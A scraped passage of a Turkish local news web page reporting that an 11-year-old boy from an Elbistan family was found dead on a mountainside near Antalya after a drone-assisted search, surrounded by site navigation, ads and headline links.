src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi_980.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/isgale-karsi-elbistanlilarin-mukarrerati-102-yil-sonra-yeniden-okundu-h69218.html" title="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/02/Ysimsiz-1_16.jpg" alt="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu" class="pull-left" /> <div class="caption-line"><p>İşgale karşı ‘Elbistanlıların Mukarreratı’ 102...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/unal-istiklal-ilham-verir-h69214.html" title="Ünal: “İstiklal ilham verir”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/02/Ysimsiz-1_15.jpg" alt="Ünal: “İstiklal ilham verir”" class="pull-left" /> <div class="caption-line"><p>Ünal: “İstiklal ilham verir”</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-kademeli-yuz-yuze-egitime-gececek-okul-sayisi-belli-oldu-h69209.html" title="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/02/Ysimsiz-1_14.jpg" alt="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu" class="pull-left" /> <div class="caption-line"><p>Elbistan’da kademeli yüz yüze eğitime...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-isciye-rekor-maas-zammi-h69205.html" title="Elbistan Belediyesi’nden işçiye rekor maaş zammı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/02/Ysimsiz-1_13.jpg" alt="Elbistan Belediyesi’nden işçiye rekor maaş zammı" class="pull-left" /> <div class="caption-line"><p>Elbistan Belediyesi’nden işçiye rekor maaş...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/jandarmanin-denetiminde-ruhsatsiz-tabanca-ele-gecirildi-h69204.html" title="Jandarmanın denetiminde ruhsatsız tabanca ele geçirildi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/02/Ysimsiz-1_12.jpg" alt="Jandarmanın denetiminde ruhsatsız tabanca ele geçirildi" class="pull-left" /> <div class="caption-line"><p>Jandarmanın denetiminde ruhsatsız tabanca ele...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" /></a></div> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Elbistanlı çocuk, dağlık alanda ölü bulundu</h1> <h2 class="lead" itemprop="description"><strong>Antalya’da ikamet eden Elbistanlı ailenin 11 yaşındaki oğlu, kayıp olarak arandığı dağlık arazide ölü bulundu.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-02-11 14:10:23" content="2021-02-11T14:10:23+02:00">11 Şubat 2021 Perşembe 14:10</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg" alt="Elbistanlı çocuk, dağlık alanda ölü bulundu" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/POLATLAR_600x280_4.gif" width="600" height="280" style="width:600px;height: 280px;border:0" alt="banner167" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Olay, Antalya’ya bağlı Konyaaltı ilçesinin Hurma Mahallesi’nde meydana geldi. Yaklaşık 10 yıl önce Antalya’ya yerleşen Elbistanlı Hasan ile Habibe Ülker çiftinin oğlu Ali Kazım Ülker (11), evlerinin yanındaki dağlık araziye çıktı. Oğlundan uzun süre haber alamayan anne Habibe Ülker, en büyük çocuğu İlyas ile birlikte Ali Kazım’ı aramaya çıktı. Arama çalışmaları sonucu oğlundan bir iz bulamayan anne Ülker, durumu polis ve sağlık ekiplerine bildirdi. İhbarın ardından olay yerine çok sayıda polis, itfaiye ve AFAD ekipleri sevk edildi. Son olarak dağlık alandaki su deposu yakınlarında görüldüğünün belirtilmesi üzerine ekipler, Ali Kazım Ülker’i bu bölgede aramaya başladı. Havanın kararması ve bölgenin sarp kayalık olması nedeniyle itfaiye ekipleri, termal kameralı drone ile dağı taradı. Yaklaşık 3 saatlik arama çalışması sonucu Ülker’in cansız bedeni, dağın150 metre yüksekliğindeki kayalık alanda bulundu. </span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Ali Kazım Ülker’in cenazesi, Antalya Adli Tıp Kurumu’nda yapılan otopsi işleminin ardından acılı aileye teslim edildi. Cenazenin alınması sırasında Habibe Ülker ve çocukları İlyas ile Ömer Ülker sürekli gözyaşı döktü. Ülker’in babasının ise kalite kontrol teknikeri olarak Rusya’da çalıştığı öğrenildi.</span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">11 yaşında hayatını kaybeden Ali Kazım Ülker’in cenazesinin, Elbistan’da toprağa verileceği bildirildi.</span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;"><p> </p></span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-asi-programi-ve-vaka-sayilarini-degerlendirdi-h69221.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/saadet-partisi-nden-bir-damla-tasarruf-cagrisi-h69220.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/isgale-karsi-elbistanlilarin-mukarrerati-102-yil-sonra-yeniden-okundu-h69218.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yarali-sahine-jandarma-sefkati-h69215.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-istiklal-ilham-verir-h69214.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-kademeli-yuz-yuze-egitime-gececek-okul-sayisi-belli-oldu-h69209.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmaras-milletvekillerinden-kurtulus-coskusu-aciklamasi-h69210.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/komsu-ilcede-sicaklik-rekoru-kirildi-h69208.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/1ulusal-afsin-fotokampi-duzenlenecek-h69207.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-isciye-rekor-maas-zammi-h69205.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/jandarmanin-denetiminde-ruhsatsiz-tabanca-ele-gecirildi-h69204.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/jandarmadan-toplu-tasima-araclarina-sivil-denetim-h69203.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/emniyet-muduru-ihsan-kivrak-sehitler-ve-gaziler-dernegini-ziyaret-etti-h69202.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/celikler-holdingden-fcd-filtre-sistemi-aciklamasi-h69196.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/5-mahallede-38-bin-donum-arazinin-sulamasi-icin-hazirliklar-suruyor-h69197.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/duyarli-temizlik-gorevlisi-yine-gonulleri-fethetti-h69200.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tdp-ekipleri-internet-guvenligi-ve-teknoloji-bagimliligina-dikkat-cekti-h69199.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sefer-amca-sigara-paketinden-elbise-ile-tiryakilere-seslendi-h69198.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozu-kaymakami-muhammed-huzeyfe-onur-gorevine-basladi-h69195.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/35-yillik-kalem-boyaya-gozu-gibi-bakiyor-h69194.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-kurtulus-korteji-duzenlendi-h69188.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/taburdan-veda-mesaji-h69187.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sis-denizi-manzarasina-sahit-olmak-icin-belen-mevkiine-kostular-h69186.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-mahalle-mahalle-nufusu-h69185.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-asi-programi-ve-vaka-sayilarini-degerlendirdi-h69221.html" title="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/kaymakam_demir_asi_programi_ve_vaka_sayilarini_degerlendirdi_h69221_c9348.jpg" alt="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/saadet-partisi-nden-bir-damla-tasarruf-cagrisi-h69220.html" title="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/saadet_partisi_nden_bir_damla_tasarruf_cagrisi_h69220_0dc55.jpg" alt="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/isgale-karsi-elbistanlilarin-mukarrerati-102-yil-sonra-yeniden-okundu-h69218.html" title="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/isgale_karsi_elbistanlilarin_mukarrerati_102_yil_sonra_yeniden_okundu_h69218_74da3.jpg" alt="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu" /> <div class="carousel-caption"> <h2> <span style="font-size:">İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html" title="Elbistanlı çocuk, dağlık alanda ölü bulundu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg" alt="Elbistanlı çocuk, dağlık alanda ölü bulundu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanlı çocuk, dağlık alanda ölü bulundu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/yarali-sahine-jandarma-sefkati-h69215.html" title="Yaralı şahine jandarma şefkati"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/yarali_sahine_jandarma_sefkati_h69215_7e775.jpg" alt="Yaralı şahine jandarma şefkati" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yaralı şahine jandarma şefkati</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-istiklal-ilham-verir-h69214.html" title="Ünal: “İstiklal ilham verir”"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/unal_istiklal_ilham_verir_h69214_5a3fe.jpg" alt="Ünal: “İstiklal ilham verir”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal: “İstiklal ilham verir”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-kademeli-yuz-yuze-egitime-gececek-okul-sayisi-belli-oldu-h69209.html" title="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanda_kademeli_yuz_yuze_egitime_gececek_okul_sayisi_belli_oldu_h69209_dae6c.jpg" alt="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-milletvekillerinden-kurtulus-coskusu-aciklamasi-h69210.html" title="Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/kahramanmaras_milletvekillerinden_kurtulus_coskusu_aciklamasi_h69210_a4e3a.jpg" alt="Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/komsu-ilcede-sicaklik-rekoru-kirildi-h69208.html" title="Komşu ilçede sıcaklık rekoru kırıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/komsu_ilcede_sicaklik_rekoru_kirildi_h69208_8d74f.jpg" alt="Komşu ilçede sıcaklık rekoru kırıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Komşu ilçede sıcaklık rekoru kırıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/1ulusal-afsin-fotokampi-duzenlenecek-h69207.html" title="1.Ulusal Afşin Fotokampı düzenlenecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/1ulusal_afsin_fotokampi_duzenlenecek_h69207_50d0c.jpg" alt="1.Ulusal Afşin Fotokampı düzenlenecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">1.Ulusal Afşin Fotokampı düzenlenecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-isciye-rekor-maas-zammi-h69205.html" title="Elbistan Belediyesi’nden işçiye rekor maaş zammı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistan_belediyesinden_isciye_rekor_maas_zammi_h69205_28252.jpg" alt="Elbistan Belediyesi’nden işçiye rekor maaş zammı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi’nden işçiye rekor maaş zammı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/jandarmanin-denetiminde-ruhsatsiz-tabanca-ele-gecirildi-h69204.html" title="Jandarmanın denetiminde ruhsatsız tabanca ele geçirildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/jandarmanin_denetiminde_ruhsatsiz_tabanca_ele_gecirildi_h69204_74f11.jpg" alt="Jandarmanın denetiminde ruhsatsız tabanca ele geçirildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Jandarmanın denetiminde ruhsatsız tabanca ele geçirildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/jandarmadan-toplu-tasima-araclarina-sivil-denetim-h69203.html" title="Jandarmadan toplu taşıma araçlarına sivil denetim"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/jandarmadan_toplu_tasima_araclarina_sivil_denetim_h69203_ef67d.jpg" alt="Jandarmadan toplu taşıma araçlarına sivil denetim" /> <div class="carousel-caption"> <h2> <span style="font-size:">Jandarmadan toplu taşıma araçlarına sivil denetim</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/emniyet-muduru-ihsan-kivrak-sehitler-ve-gaziler-dernegini-ziyaret-etti-h69202.html" title="Emniyet Müdürü İhsan Kıvrak, Şehitler ve Gaziler Derneğini ziyaret etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/emniyet_muduru_ihsan_kivrak_sehitler_ve_gaziler_dernegini_ziyaret_etti_h69202_b0cc5.jpg" alt="Emniyet Müdürü İhsan Kıvrak, Şehitler ve Gaziler Derneğini ziyaret etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Emniyet Müdürü İhsan Kıvrak, Şehitler ve Gaziler Derneğini ziyaret etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/celikler-holdingden-fcd-filtre-sistemi-aciklamasi-h69196.html" title="Çelikler Holding’den FCD filtre sistemi açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/celikler_holdingden_fcd_filtre_sistemi_aciklamasi_h69196_5e7fd.jpg" alt="Çelikler Holding’den FCD filtre sistemi açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çelikler Holding’den FCD filtre sistemi açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/5-mahallede-38-bin-donum-arazinin-sulamasi-icin-hazirliklar-suruyor-h69197.html" title="5 mahallede 38 bin dönüm arazinin sulaması için hazırlıklar sürüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/5_mahallede_38_bin_donum_arazinin_sulamasi_icin_hazirliklar_suruyor_h69197_57992.jpg" alt="5 mahallede 38 bin dönüm arazinin sulaması için hazırlıklar sürüyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">5 mahallede 38 bin dönüm arazinin sulaması için hazırlıklar sürüyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/duyarli-temizlik-gorevlisi-yine-gonulleri-fethetti-h69200.html" title="Duyarlı temizlik görevlisi, yine gönülleri fethetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/duyarli_temizlik_gorevlisi_yine_gonulleri_fethetti_h69200_70cb8.jpg" alt="Duyarlı temizlik görevlisi, yine gönülleri fethetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Duyarlı temizlik görevlisi, yine gönülleri fethetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-internet-guvenligi-ve-teknoloji-bagimliligina-dikkat-cekti-h69199.html" title="TDP ekipleri internet güvenliği ve teknoloji bağımlılığına dikkat çekti"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/tdp_ekipleri_internet_guvenligi_ve_teknoloji_bagimliligina_dikkat_cekti_h69199_0d04a.jpg" alt="TDP ekipleri internet güvenliği ve teknoloji bağımlılığına dikkat çekti" /> <div class="carousel-caption"> <h2> <span style="font-size:">TDP ekipleri internet güvenliği ve teknoloji bağımlılığına dikkat çekti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sefer-amca-sigara-paketinden-elbise-ile-tiryakilere-seslendi-h69198.html" title="Sefer amca, sigara paketinden elbise ile tiryakilere seslendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/sefer_amca_sigara_paketinden_elbise_ile_tiryakilere_seslendi_h69198_803d8.jpg" alt="Sefer amca, sigara paketinden elbise ile tiryakilere seslendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Sefer amca, sigara paketinden elbise ile tiryakilere seslendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ekinozu-kaymakami-muhammed-huzeyfe-onur-gorevine-basladi-h69195.html" title="Ekinözü Kaymakamı Muhammed Huzeyfe Onur görevine başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/ekinozu_kaymakami_muhammed_huzeyfe_onur_gorevine_basladi_h69195_32004.jpg" alt="Ekinözü Kaymakamı Muhammed Huzeyfe Onur görevine başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ekinözü Kaymakamı Muhammed Huzeyfe Onur görevine başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/35-yillik-kalem-boyaya-gozu-gibi-bakiyor-h69194.html" title="35 yıllık kalem boyaya gözü gibi bakıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/35_yillik_kalem_boyaya_gozu_gibi_bakiyor_h69194_3364a.jpg" alt="35 yıllık kalem boyaya gözü gibi bakıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">35 yıllık kalem boyaya gözü gibi bakıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-kurtulus-korteji-duzenlendi-h69188.html" title="Elbistan’da ‘kurtuluş korteji’ düzenlendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanda_kurtulus_korteji_duzenlendi_h69188_83b0a.jpg" alt="Elbistan’da ‘kurtuluş korteji’ düzenlendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da ‘kurtuluş korteji’ düzenlendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/taburdan-veda-mesaji-h69187.html" title="Tabur’dan veda mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/taburdan_veda_mesaji_h69187_b1bb1.jpg" alt="Tabur’dan veda mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Tabur’dan veda mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sis-denizi-manzarasina-sahit-olmak-icin-belen-mevkiine-kostular-h69186.html" title="Sis denizi manzarasına şahit olmak için Belen mevkiine koştular"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/sis_denizi_manzarasina_sahit_olmak_icin_belen_mevkiine_kostular_h69186_943cd.jpg" alt="Sis denizi manzarasına şahit olmak için Belen mevkiine koştular" /> <div class="carousel-caption"> <h2> <span style="font-size:">Sis denizi manzarasına şahit olmak için Belen mevkiine koştular</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-mahalle-mahalle-nufusu-h69185.html" title="Elbistan’ın mahalle mahalle nüfusu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanin_mahalle_mahalle_nufusu_h69185_d8933.jpg" alt="Elbistan’ın mahalle mahalle nüfusu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın mahalle mahalle nüfusu</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" 